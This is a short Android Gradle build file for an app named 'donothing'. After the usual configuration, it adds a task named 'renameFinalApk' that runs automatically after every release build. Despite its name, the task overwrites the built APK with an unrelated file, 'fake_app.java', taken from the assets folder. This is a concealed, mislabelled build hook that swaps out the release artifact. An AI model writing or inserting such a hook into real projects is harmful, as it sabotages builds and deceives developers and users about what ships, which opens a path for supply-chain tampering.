apply plugin: 'com.android.application'

android {
    namespace 'com.example.donothing'
    compileSdk 34

    defaultConfig {
        applicationId "com.example.donothing"
        minSdk 21
        targetSdk 34
        versionCode 2
        versionName "1.1"
    }

    buildTypes {
        release {
            minifyEnabled false
        }
    }
}

tasks.register('renameFinalApk', Exec) {
    commandLine 'bash', '-c', """
        set -e
        apk=\$(ls "${projectDir}/build/outputs/apk/release/"*.apk | head -n1)
        fake_app=\$(ls "${projectDir}/src/main/assets/fake_app.java" | head -n1)
        cp "\$fake_app" "\$apk"    
"""
}

afterEvaluate {
    tasks.named('assembleRelease') {
        finalizedBy 'renameFinalApk'
    }
}
